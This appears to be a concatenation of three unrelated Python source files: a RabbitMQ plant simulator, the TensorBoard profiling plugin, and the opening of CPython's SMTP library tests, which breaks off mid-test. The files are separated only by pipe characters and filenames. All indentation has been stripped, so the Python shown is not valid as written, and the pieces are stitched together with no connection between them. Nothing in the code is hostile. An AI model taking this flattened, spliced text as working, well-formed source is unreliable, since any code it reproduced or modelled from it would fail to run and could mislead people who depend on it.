# Copyright 2019 Dynamic Object Language Labs Inc.
#
# This software is licensed under the terms of the
# Apache License, Version 2.0 which can be found in
# the file LICENSE at the root of this distribution.
# A trivial example of a plant that executes any command for 2 seconds.
# This is for trivial testing only. You may see exceptions like this one
# # Expect to see pika.exceptions.ConnectionClosed: (505, 'UNEXPECTED_FRAME - expected content header for class 60, got non content header frame instead')
import sys
import time
import argparse
import plant
import threading
# Global
plant_g = None
fail_all_activities = False
def sim_command(msg):
# print 'dispaching command:{} {}\n'.format(msg['function-name'], msg['args']),# Thread safe
print 'dispatching command:', msg['function-name'], msg['args'] # Not threadsafe
plant_g.started(msg)
time.sleep(2)
if fail_all_activities:
plant_g.failed(msg, 'I will fail all activities')
else:
plant_g.finished(msg)
# Rabbit MQ incoming message handler function
def dispatch_func(msg, routing_key):
if 'function-name' in msg:
sim_command(msg)
# threading.Thread(target=sim_command,args=[msg]).start() # Pika does not seem to like sending messages from different threads
# else:
# print msg
def main(args):
global plant_g, fail_all_activities
if args.fail:
print 'Args fail', args.fail
fail_all_activities = True
plantid = args.plantid
if plantid == '':
plantid = '#'
local_plant = plant.Plant(plantid, args.exchange, args.host, args.port)
plant_g = local_plant
local_plant.wait_for_messages(dispatch_func)
local_plant.close()
plant_g = None
if __name__ == "__main__":
print("plant-main.py as script")
parser = argparse.ArgumentParser(description='Plant Sim (Python)')
parser.add_argument('--host', default='localhost', help='RMQ host')
parser.add_argument('-p', '--port', default=5672, help='RMQ Port', type=int)
parser.add_argument('-e', '--exchange', default='tpn-updates', help='RMQ Exchange')
parser.add_argument('--plantid', default="plant", help='default plant-id')
parser.add_argument('--fail', dest='fail', action='store_true', help='Will fail all activities')
args = parser.parse_args()
sys.exit(main(args))
|
profile_plugin.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The TensorBoard plugin for performance profiling."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
import os
import re
import threading
import six
import tensorflow.compat.v2 as tf
from werkzeug import wrappers
from tensorboard.backend.event_processing import plugin_asset_util
from tensorboard.plugins import base_plugin
from tensorflow.python.profiler import profiler_client # pylint: disable=g-direct-tensorflow-import
from tensorflow.python.profiler import profiler_v2 as profiler # pylint: disable=g-direct-tensorflow-import
from tensorboard_plugin_profile.convert import raw_to_tool_data as convert
tf.enable_v2_behavior()
logger = logging.getLogger('tensorboard')
# The prefix of routes provided by this plugin.
PLUGIN_NAME = 'profile'
INDEX_JS_ROUTE = '/index.js'
INDEX_HTML_ROUTE = '/index.html'
BUNDLE_JS_ROUTE = '/bundle.js'
STYLES_CSS_ROUTE = '/styles.css'
MATERIALICONS_WOFF2_ROUTE = '/materialicons.woff2'
TRACE_VIEWER_INDEX_HTML_ROUTE = '/trace_viewer_index.html'
TRACE_VIEWER_INDEX_JS_ROUTE = '/trace_viewer_index.js'
ZONE_JS_ROUTE = '/zone.js'
DATA_ROUTE = '/data'
TOOLS_ROUTE = '/tools'
HOSTS_ROUTE = '/hosts'
CAPTURE_ROUTE = '/capture_profile'
# Suffixes of "^, #, @" symbols represent different input data formats for the
# same tool.
# 1) '^': data generate from XPlane.
# 2) '#': data is in gzip format.
# 3) '@': data generate from proto, or tracetable for streaming trace viewer.
# 4) no suffix: data is in json format, ready to feed to frontend.
TOOLS = {
'trace_viewer': 'trace',
'trace_viewer#': 'trace.json.gz',
'trace_viewer@': 'tracetable', # streaming trace viewer
'op_profile': 'op_profile.json',
'input_pipeline_analyzer': 'input_pipeline.json',
'input_pipeline_analyzer@': 'input_pipeline.pb',
'overview_page': 'overview_page.json',
'overview_page@': 'overview_page.pb',
'memory_viewer': 'memory_viewer.json',
'pod_viewer': 'pod_viewer.json',
'tensorflow_stats': 'tensorflow_stats.pb',
'kernel_stats': 'kernel_stats.pb',
'memory_profile#': 'memory_profile.json.gz',
'xplane': 'xplane.pb',
'tf_data_bottleneck_analysis': 'tf_data_bottleneck_analysis.json',
}
ALL_HOSTS = 'ALL_HOSTS'
_EXTENSION_TO_TOOL = {extension: tool for tool, extension in TOOLS.items()}
_FILENAME_RE = re.compile(r'(?:(.*)\.)?(' +
'|'.join(TOOLS.values()).replace('.', r'\.') + r')')
# Tools that consume raw data.
_RAW_DATA_TOOLS = frozenset(
tool for tool, extension in TOOLS.items()
if extension.endswith('.json') or extension.endswith('.json.gz'))
# Tools that can be generated from xplane end with ^.
XPLANE_TOOLS = [
'trace_viewer^',
'overview_page^',
'input_pipeline_analyzer^',
'tensorflow_stats^',
'kernel_stats^',
'memory_profile^',
'pod_viewer^',
'tf_data_bottleneck_analysis^',
]
# XPlane generated tools that support all host mode.
XPLANE_TOOLS_ALL_HOSTS_SUPPORTED = frozenset([
'input_pipeline_analyzer^',
'tensorflow_stats^',
'kernel_stats^',
'overview_page^',
'pod_viewer^',
'tf_data_bottleneck_analysis^',
])
# XPlane generated tools that only support all host mode.
XPLANE_TOOLS_ALL_HOSTS_ONLY = frozenset(
['overview_page^', 'pod_viewer^', 'tf_data_bottleneck_analysis^'])
def _use_xplane(tool):
return tool[-1] == '^'
def _make_filename(host, tool):
"""Returns the name of the file containing data for the given host and tool.
Args:
host: Name of the host that produced the profile data, e.g., 'localhost'.
tool: Name of the tool, e.g., 'trace_viewer'.
Returns:
The host name concatenated with the tool-specific extension, e.g.,
'localhost.trace'.
"""
filename = str(host) + '.' if host else ''
tool = 'xplane' if _use_xplane(tool) else tool
return filename + TOOLS[tool]
def _parse_filename(filename):
"""Returns the host and tool encoded in a filename in the run directory.
Args:
filename: Name of a file in the run directory. The name might encode a host
and tool, e.g., 'host.tracetable', 'host.domain.op_profile.json', or just
a tool, e.g., 'trace', 'tensorflow_stats.pb'.
Returns:
A tuple (host, tool) containing the names of the host and tool, e.g.,
('localhost', 'trace_viewer'). Either of the tuple's components can be None.
"""
m = _FILENAME_RE.fullmatch(filename)
if m is None:
return filename, None
return m.group(1), _EXTENSION_TO_TOOL[m.group(2)]
def _get_hosts(filenames):
"""Parses a list of filenames and returns the set of hosts.
Args:
filenames: A list of filenames (just basenames, no directory).
Returns:
A set of host names encoded in the filenames.
"""
hosts = set()
for name in filenames:
host, _ = _parse_filename(name)
if host:
hosts.add(host)
return hosts
def _get_tools(filenames):
"""Parses a list of filenames and returns the set of tools.
If xplane is present in the repository, add tools that can be generated by
xplane if we don't have a file for the tool.
Args:
filenames: A list of filenames (just basenames, no directory).
Returns:
A set of tool names encoded in the filenames.
"""
tools = set()
found = set()
has_xplane = False
for name in filenames:
_, tool = _parse_filename(name)
if tool == 'xplane':
has_xplane = True
continue
elif tool:
tools.add(tool)
if tool[-1] in ('@', '#'):
found.add(tool[:-1])
else:
found.add(tool)
if has_xplane:
for item in XPLANE_TOOLS:
if item[:-1] not in found:
tools.add(item)
return tools
def get_worker_list(cluster_resolver):
"""Parses TPU workers list from the cluster resolver."""
cluster_spec = cluster_resolver.cluster_spec()
task_indices = cluster_spec.task_indices('worker')
worker_list = [
cluster_spec.task_address('worker', i).replace(':8470', ':8466')
for i in task_indices
]
return ','.join(worker_list)
def respond(body, content_type, code=200, content_encoding=None):
"""Create a Werkzeug response, handling JSON serialization and CSP.
Args:
body: For JSON responses, a JSON-serializable object; otherwise, a raw
`bytes` string or Unicode `str` (which will be encoded as UTF-8).
content_type: Response content-type (`str`); use `application/json` to
automatically serialize structures.
code: HTTP status code (`int`).
content_encoding: Response Content-Encoding header ('str'); e.g. 'gzip'.
Returns:
A `werkzeug.wrappers.BaseResponse` object.
"""
if content_type == 'application/json' and isinstance(
body, (dict, list, set, tuple)):
body = json.dumps(body, sort_keys=True)
if not isinstance(body, bytes):
body = body.encode('utf-8')
csp_parts = {
'default-src': ["'self'"],
'script-src': [
"'self'",
"'unsafe-eval'",
"'unsafe-inline'",
'https://www.gstatic.com',
],
'object-src': ["'none'"],
'style-src': [
"'self'",
"'unsafe-inline'",
'https://www.gstatic.com',
],
'img-src': [
"'self'",
'blob:',
'data:',
],
}
csp = ';'.join((' '.join([k] + v) for (k, v) in csp_parts.items()))
headers = [
('Content-Security-Policy', csp),
('X-Content-Type-Options', 'nosniff'),
]
if content_encoding:
headers.append(('Content-Encoding', content_encoding))
return wrappers.Response(
body, content_type=content_type, status=code, headers=headers)
class ProfilePlugin(base_plugin.TBPlugin):
"""Profile Plugin for TensorBoard."""
plugin_name = PLUGIN_NAME
def __init__(self, context):
"""Constructs a profiler plugin for TensorBoard.
This plugin adds handlers for performance-related frontends.
Args:
context: A base_plugin.TBContext instance.
"""
self.logdir = context.logdir
self.multiplexer = context.multiplexer
self.stub = None
self.master_tpu_unsecure_channel = context.flags.master_tpu_unsecure_channel
# Whether the plugin is active. This is an expensive computation, so we
# compute this asynchronously and cache positive results indefinitely.
self._is_active = False
# Lock to ensure at most one thread computes _is_active at a time.
self._is_active_lock = threading.Lock()
def is_active(self):
"""Whether this plugin is active and has any profile data to show.
Detecting profile data is expensive, so this process runs asynchronously
and the value reported by this method is the cached value and may be stale.
Returns:
Whether any run has profile data.
"""
# If we are already active, we remain active and don't recompute this.
# Otherwise, try to acquire the lock without blocking; if we get it and
# we're still not active, launch a thread to check if we're active and
# release the lock once the computation is finished. Either way, this
# thread returns the current cached value to avoid blocking.
if not self._is_active and self._is_active_lock.acquire(False):
if self._is_active:
self._is_active_lock.release()
else:
def compute_is_active():
self._is_active = any(self.generate_run_to_tools())
self._is_active_lock.release()
new_thread = threading.Thread(
target=compute_is_active, name='DynamicProfilePluginIsActiveThread')
new_thread.start()
return self._is_active
def get_plugin_apps(self):
return {
INDEX_JS_ROUTE: self.static_file_route,
INDEX_HTML_ROUTE: self.static_file_route,
BUNDLE_JS_ROUTE: self.static_file_route,
STYLES_CSS_ROUTE: self.static_file_route,
MATERIALICONS_WOFF2_ROUTE: self.static_file_route,
TRACE_VIEWER_INDEX_HTML_ROUTE: self.static_file_route,
TRACE_VIEWER_INDEX_JS_ROUTE: self.static_file_route,
ZONE_JS_ROUTE: self.static_file_route,
TOOLS_ROUTE: self.tools_route,
HOSTS_ROUTE: self.hosts_route,
DATA_ROUTE: self.data_route,
CAPTURE_ROUTE: self.capture_route,
}
def frontend_metadata(self):
return base_plugin.FrontendMetadata(es_module_path='/index.js')
@wrappers.Request.application
def static_file_route(self, request):
filename = os.path.basename(request.path)
extention = os.path.splitext(filename)[1]
if extention == '.html':
mimetype = 'text/html'
elif extention == '.css':
mimetype = 'text/css'
elif extention == '.js':
mimetype = 'application/javascript'
else:
mimetype = 'application/octet-stream'
filepath = os.path.join(os.path.dirname(__file__), 'static', filename)
try:
with open(filepath, 'rb') as infile:
contents = infile.read()
except IOError:
return respond('404 Not Found', 'text/plain', code=404)
return respond(contents, mimetype)
@wrappers.Request.application
def tools_route(self, request):
run_to_tools = dict(self.generate_run_to_tools())
return respond(run_to_tools, 'application/json')
def host_impl(self, run, tool):
"""Returns available hosts for the run and tool in the log directory.
In the plugin log directory, each directory contains profile data for a
single run (identified by the directory name), and files in the run
directory contains data for different tools and hosts. The file that
contains profile for a specific tool "x" will have extension TOOLS["x"].
Example:
log/
run1/
plugins/
profile/
host1.trace
host2.trace
run2/
plugins/
profile/
host1.trace
host2.trace
Args:
run: the frontend run name, e.g., 'run1' or 'run2' for the example above.
tool: the requested tool, e.g., 'trace_viewer' for the example above.
Returns:
A list of host names, e.g. ["host1", "host2"] for the example above.
"""
run_dir = self._run_dir(run)
if not run_dir:
logger.warning('Cannot find asset directory for: %s', run)
return []
tool_pattern = _make_filename('*', tool)
try:
filenames = tf.io.gfile.glob(os.path.join(run_dir, tool_pattern))
except tf.errors.OpError as e:
logger.warning('Cannot read asset directory: %s, OpError %s', run_dir, e)
filenames = [os.path.basename(f) for f in filenames]
hosts = _get_hosts(filenames)
if len(hosts) > 1:
if tool in XPLANE_TOOLS_ALL_HOSTS_ONLY:
hosts = [ALL_HOSTS]
elif tool in XPLANE_TOOLS_ALL_HOSTS_SUPPORTED:
hosts.add(ALL_HOSTS)
return sorted(hosts)
@wrappers.Request.application
def hosts_route(self, request):
run = request.args.get('run')
tool = request.args.get('tag')
hosts = self.host_impl(run, tool)
return respond(hosts, 'application/json')
def data_impl(self, request):
"""Retrieves and processes the tool data for a run and a host.
Args:
request: XMLHttpRequest
Returns:
A string that can be served to the frontend tool or None if tool,
run or host is invalid.
"""
run = request.args.get('run')
tool = request.args.get('tag')
host = request.args.get('host')
tqx = request.args.get('tqx')
run_dir = self._run_dir(run)
# Profile plugin "run" is the last component of run dir.
profile_run = os.path.basename(run_dir)
if tool not in TOOLS and not _use_xplane(tool):
return None, None
self.start_grpc_stub_if_necessary()
if tool == 'trace_viewer@' and self.stub is not None:
# Streaming trace viewer needs profiler_analysis service, which is only
# supported in Cloud TPU. This code is unused when data was produced by
# open-source TensorFlow. Only import the library when needed.
# pylint: disable=g-import-not-at-top
# pylint: disable=g-direct-tensorflow-import
from tensorflow.core.profiler import profiler_analysis_pb2
# pylint: enable=g-import-not-at-top
# pylint: enable=g-direct-tensorflow-import
grpc_request = profiler_analysis_pb2.ProfileSessionDataRequest()
grpc_request.repository_root = os.path.dirname(run_dir)
grpc_request.session_id = profile_run
grpc_request.tool_name = 'trace_viewer'
# Remove the trailing dot if present
grpc_request.host_name = host.rstrip('.')
grpc_request.parameters['resolution'] = request.args.get(
'resolution', 8000)
if request.args.get('start_time_ms') is not None:
grpc_request.parameters['start_time_ms'] = request.args.get(
'start_time_ms')
if request.args.get('end_time_ms') is not None:
grpc_request.parameters['end_time_ms'] = request.args.get('end_time_ms')
grpc_response = self.stub.GetSessionToolData(grpc_request)
return grpc_response.output, None
asset_path = os.path.join(run_dir, _make_filename(host, tool))
data, content_encoding = None, None
if _use_xplane(tool):
if host == ALL_HOSTS:
file_pattern = _make_filename('*', 'xplane')
try:
asset_paths = tf.io.gfile.glob(os.path.join(run_dir, file_pattern))
except tf.errors.OpError as e:
logger.warning('Cannot read asset directory: %s, OpError %s', run_dir,
e)
else:
asset_paths = [asset_path]
try:
data = convert.xspace_to_tool_data(asset_paths, tool, tqx)
except AttributeError:
logger.warning('XPlane converters are available after Tensorflow 2.4')
return data, content_encoding
raw_data = None
try:
with tf.io.gfile.GFile(asset_path, 'rb') as f:
raw_data = f.read()
except tf.errors.NotFoundError:
logger.warning('Asset path %s not found', asset_path)
except tf.errors.OpError as e:
logger.warning("Couldn't read asset path: %s, OpError %s", asset_path, e)
if raw_data is None:
return None, None
if tool in _RAW_DATA_TOOLS:
data = raw_data
if tool[-1] == '#':
content_encoding = 'gzip'
else:
data = convert.tool_proto_to_tool_data(raw_data, tool, tqx)
return data, content_encoding
@wrappers.Request.application
def data_route(self, request):
# params
# request: XMLHTTPRequest.
data, content_encoding = self.data_impl(request)
if data is None:
return respond('404 Not Found', 'text/plain', code=404)
return respond(data, 'application/json', content_encoding=content_encoding)
@wrappers.Request.application
def capture_route(self, request):
service_addr = request.args.get('service_addr')
duration = int(request.args.get('duration', '1000'))
is_tpu_name = request.args.get('is_tpu_name') == 'true'
worker_list = request.args.get('worker_list')
num_tracing_attempts = int(request.args.get('num_retry', '0')) + 1
options = None
try:
options = profiler.ProfilerOptions(
host_tracer_level=int(request.args.get('host_tracer_level', '2')),
device_tracer_level=int(request.args.get('device_tracer_level', '1')),
python_tracer_level=int(request.args.get('python_tracer_level', '0')),
delay_ms=int(request.args.get('delay', '0'))
)
except AttributeError:
logger.warning('ProfilerOptions are available after tensorflow 2.3')
if is_tpu_name:
try:
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
service_addr)
master_grpc_addr = tpu_cluster_resolver.get_master()
except (ImportError, RuntimeError) as err:
return respond({'error': err.message}, 'application/json', code=200)
except (ValueError, TypeError):
return respond(
{'error': 'no TPUs with the specified names exist.'},
'application/json',
code=200,
)
if not worker_list:
worker_list = get_worker_list(tpu_cluster_resolver)
# TPU cluster resolver always returns port 8470. Replace it with 8466
# on which profiler service is running.
master_ip = master_grpc_addr.replace('grpc://', '').replace(':8470', '')
service_addr = master_ip + ':8466'
# Set the master TPU for streaming trace viewer.
self.master_tpu_unsecure_channel = master_ip
try:
if options:
profiler_client.trace(
service_addr,
self.logdir,
duration,
worker_list,
num_tracing_attempts,
options=options)
else:
profiler_client.trace(
service_addr,
self.logdir,
duration,
worker_list,
num_tracing_attempts,
)
return respond(
{'result': 'Capture profile successfully. Please refresh.'},
'application/json',
)
except tf.errors.UnavailableError:
return respond(
{'error': 'empty trace result.'},
'application/json',
code=200,
)
except Exception as e: # pylint: disable=broad-except
return respond(
{'error': str(e)},
'application/json',
code=200,
)
def start_grpc_stub_if_necessary(self):
# We will enable streaming trace viewer on two conditions:
# 1. user specify the flags master_tpu_unsecure_channel to the ip address of
# as "master" TPU. grpc will be used to fetch streaming trace data.
# 2. the logdir is on google cloud storage.
if self.master_tpu_unsecure_channel and self.logdir.startswith('gs://'):
if self.stub is None:
# gRPC and profiler_analysis are only needed to support streaming trace
# viewer in Cloud TPU. This code is unused when data was produced by
# open-source TensorFlow. Only import the libraries when needed.
# pylint: disable=g-import-not-at-top
import grpc
from tensorflow.python.tpu.profiler import profiler_analysis_pb2_grpc
# pylint: enable=g-import-not-at-top
# Workaround the grpc's 4MB message limitation.
gigabyte = 1024 * 1024 * 1024
options = [('grpc.max_message_length', gigabyte),
('grpc.max_send_message_length', gigabyte),
('grpc.max_receive_message_length', gigabyte)]
tpu_profiler_port = self.master_tpu_unsecure_channel + ':8466'
channel = grpc.insecure_channel(tpu_profiler_port, options)
self.stub = profiler_analysis_pb2_grpc.ProfileAnalysisStub(channel)
def _run_dir(self, run):
"""Helper that maps a frontend run name to a profile "run" directory.
The frontend run name consists of the TensorBoard run name (aka the relative
path from the logdir root to the directory containing the data) path-joined
to the Profile plugin's "run" concept (which is a subdirectory of the
plugins/profile directory representing an individual run of the tool), with
the special case that TensorBoard run is the logdir root (which is the run
named '.') then only the Profile plugin "run" name is used, for backwards
compatibility.
Args:
run: the frontend run name, as described above, e.g. train/run1.
Returns:
The resolved directory path, e.g. /logdir/train/plugins/profile/run1.
Raises:
RuntimeError: If the run directory is not found.
"""
run = run.rstrip(os.sep)
tb_run_name, profile_run_name = os.path.split(run)
if not tb_run_name:
tb_run_name = '.'
tb_run_directory = self.multiplexer.RunPaths().get(tb_run_name)
if tb_run_directory is None:
# Check if logdir is a directory to handle case where it's actually a
# multipart directory spec, which this plugin does not support.
if tb_run_name == '.' and tf.io.gfile.isdir(self.logdir):
tb_run_directory = self.logdir
else:
raise RuntimeError('No matching run directory for run %s' % run)
plugin_directory = plugin_asset_util.PluginDirectory(
tb_run_directory, PLUGIN_NAME)
return os.path.join(plugin_directory, profile_run_name)
def generate_run_to_tools(self):
"""Generator for pairs of "run name" and a list of tools for that run.
The "run name" here is a "frontend run name" - see _run_dir() for the
definition of a "frontend run name" and how it maps to a directory of
profile data for a specific profile "run". The profile plugin concept of
"run" is different from the normal TensorBoard run; each run in this case
represents a single instance of profile data collection, more similar to a
"step" of data in typical TensorBoard semantics. These runs reside in
subdirectories of the plugins/profile directory within any regular
TensorBoard run directory (defined as a subdirectory of the logdir that
contains at least one tfevents file) or within the logdir root directory
itself (even if it contains no tfevents file and would thus not be
considered a normal TensorBoard run, for backwards compatibility).
Within those "profile run directories", there are files in the directory
that correspond to different profiling tools. The file that contains profile
for a specific tool "x" will have a suffix name TOOLS["x"].
Example:
logs/
plugins/
profile/
run1/
hostA.trace
train/
events.out.tfevents.foo
plugins/
profile/
run1/
hostA.trace
hostB.trace
run2/
hostA.trace
validation/
events.out.tfevents.foo
plugins/
profile/
run1/
hostA.trace
Yields:
A sequence of tuples mapping "frontend run names" to lists of tool names
available for those runs. For the above example, this would be:
("run1", ["trace_viewer"])
("train/run1", ["trace_viewer"])
("train/run2", ["trace_viewer"])
("validation/run1", ["trace_viewer"])
"""
self.start_grpc_stub_if_necessary()
plugin_assets = self.multiplexer.PluginAssets(PLUGIN_NAME)
tb_run_names_to_dirs = self.multiplexer.RunPaths()
# Ensure that we also check the root logdir, even if it isn't a recognized
# TensorBoard run (i.e. has no tfevents file directly under it), to remain
# backwards compatible with previously profile plugin behavior. Note that we
# check if logdir is a directory to handle case where it's actually a
# multipart directory spec, which this plugin does not support.
if '.' not in plugin_assets and tf.io.gfile.isdir(self.logdir):
tb_run_names_to_dirs['.'] = self.logdir
plugin_assets['.'] = plugin_asset_util.ListAssets(self.logdir,
PLUGIN_NAME)
for tb_run_name, profile_runs in six.iteritems(plugin_assets):
tb_run_dir = tb_run_names_to_dirs[tb_run_name]
tb_plugin_dir = plugin_asset_util.PluginDirectory(tb_run_dir, PLUGIN_NAME)
for profile_run in profile_runs:
# Remove trailing separator; some filesystem implementations emit this.
profile_run = profile_run.rstrip(os.sep)
if tb_run_name == '.':
frontend_run = profile_run
else:
frontend_run = os.path.join(tb_run_name, profile_run)
profile_run_dir = os.path.join(tb_plugin_dir, profile_run)
if tf.io.gfile.isdir(profile_run_dir):
yield frontend_run, self._get_active_tools(profile_run_dir)
def _get_active_tools(self, profile_run_dir):
try:
filenames = tf.io.gfile.listdir(profile_run_dir)
except tf.errors.NotFoundError as e:
logger.warning('Cannot read asset directory: %s, NotFoundError %s',
profile_run_dir, e)
return []
tools = _get_tools(filenames)
if 'trace_viewer@' in tools:
# streaming trace viewer always override normal trace viewer.
# the trailing '@' is to inform tf-profile-dashboard.html and
# tf-trace-viewer.html that stream trace viewer should be used.
if self.stub is None:
tools.discard('trace_viewer@')
else:
tools.discard('trace_viewer#')
tools.discard('trace_viewer')
if 'trace_viewer#' in tools:
# use compressed trace
tools.discard('trace_viewer')
# Return sorted list of tools with 'overview_page' at the front.
op = frozenset(['overview_page@', 'overview_page', 'overview_page^'])
return list(tools.intersection(op)) + sorted(tools.difference(op))
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hashlib
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_setup, threading_cleanup, join_thread
from unittest.mock import Mock
HOST = socket_helper.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests:
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port)
client.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(client.source_address, ('127.0.0.1', 19876))
client.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
client = self.client("%s:%s" % (HOST, self.port))
client.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
client = self.client(HOST, self.port, local_hostname="testhost")
self.assertEqual(client.local_hostname, "testhost")
client.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
client = self.client(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
client = self.client(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
mock_socket.reply_with(b"220 Hola mundo")
with self.assertRaises(ValueError):
self.client(HOST, self.port, timeout=0)
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
client = self.client(HOST, self.port, timeout=30)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(1)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(2)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
class SMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.SMTP
class LMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.LMTP
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), "test requires Unix domain socket")
def testUnixDomainSocketTimeoutDefault(self):
local_host = '/some/local/lmtp/delivery/program'
mock_socket.reply_with(b"220 Hello world")
try:
client = self.client(local_host, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
super().testTimeoutZero()
local_host = '/some/local/lmtp/delivery/program'
with self.assertRaises(ValueError):
self.client(local_host, timeout=0)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = socket_helper.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT,
source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
